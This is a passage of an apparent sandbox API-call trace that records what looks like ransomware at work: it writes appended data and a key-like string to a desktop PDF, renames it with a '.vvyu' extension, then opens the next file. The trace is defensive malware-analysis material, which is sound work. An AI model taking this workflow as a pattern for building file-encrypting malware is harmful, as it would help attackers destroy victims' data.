0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.014] SetLastError (dwErrCode=0x0) [0188.014] GetLastError () returned 0x0 [0188.014] SetLastError (dwErrCode=0x0) [0188.014] GetLastError () returned 0x0 [0188.014] SetLastError (dwErrCode=0x0) [0188.014] GetLastError () returned 0x0 [0188.014] SetLastError (dwErrCode=0x0) [0188.014] GetLastError () returned 0x0 [0188.014] SetLastError (dwErrCode=0x0) [0188.014] GetLastError () returned 0x0 [0188.014] SetLastError (dwErrCode=0x0) [0188.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.015] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.015] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.015] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.015] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.015] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1fc0) returned 0x2ae3ea0 [0188.016] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2188 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7c0 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2140 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d808 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d898 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0188.016] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2ae5e68 [0188.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2ae6088 [0188.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6088 | out: hHeap=0x2c0000) returned 1 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d7f0 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d898 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0188.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0188.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5e68 | out: hHeap=0x2c0000) returned 1 [0188.019] GetCurrentThreadId () returned 0x5d8 [0188.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2edf00 [0188.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.019] GetCurrentThreadId () returned 0x5d8 [0188.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d898 [0188.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d7f0 [0188.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d778 [0188.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d868 [0188.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0188.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d880 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d820 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d898 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2ae5e68 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2ae6078 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2ae6290 [0188.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6078 | out: hHeap=0x2c0000) returned 1 [0188.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0188.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0188.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0188.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d808 | out: hHeap=0x2c0000) returned 1 [0188.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2140 | out: hHeap=0x2c0000) returned 1 [0188.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5e68 | out: hHeap=0x2c0000) returned 1 [0188.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.029] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0x1fb7, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x1fb7, lpOverlapped=0x0) returned 1 [0188.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.029] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1fbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.030] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0188.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0188.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.031] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0188.032] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.032] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.032] CloseHandle (hObject=0x584) returned 1 [0188.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0188.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2ae3ea0 [0188.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0188.034] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\3YV6ib1oIpsefRwtFe.pdf" (normalized: "c:\\users\\keecfmwgj\\desktop\\3yv6ib1oipsefrwtfe.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\3YV6ib1oIpsefRwtFe.pdf.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\3yv6ib1oipsefrwtfe.pdf.vvyu")) returned 1 [0188.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.037] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0188.040] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf10c2d0, ftCreationTime.dwHighDateTime=0x1d89e64, ftLastAccessTime.dwLowDateTime=0x569718d0, ftLastAccessTime.dwHighDateTime=0x1d8a153, ftLastWriteTime.dwLowDateTime=0x569718d0, ftLastWriteTime.dwHighDateTime=0x1d8a153, nFileSizeHigh=0x0, nFileSizeLow=0x18c23, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5EtXO0qde4mAaAj2.mp3", cAlternateFileName="5ETXO0~1.MP3")) returned 1 [0188.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2140 [0188.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2140 | out: hHeap=0x2c0000) returned 1 [0188.040] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\5EtXO0qde4mAaAj2.mp3") returned=".mp3" [0188.041] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5EtXO0qde4mAaAj2.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\5etxo0qde4maaaj2.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.041] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=101411) returned 1 [0188.041] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.044] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18bfd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.044] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.048] SetFilePointer (in: hFile=0x584, 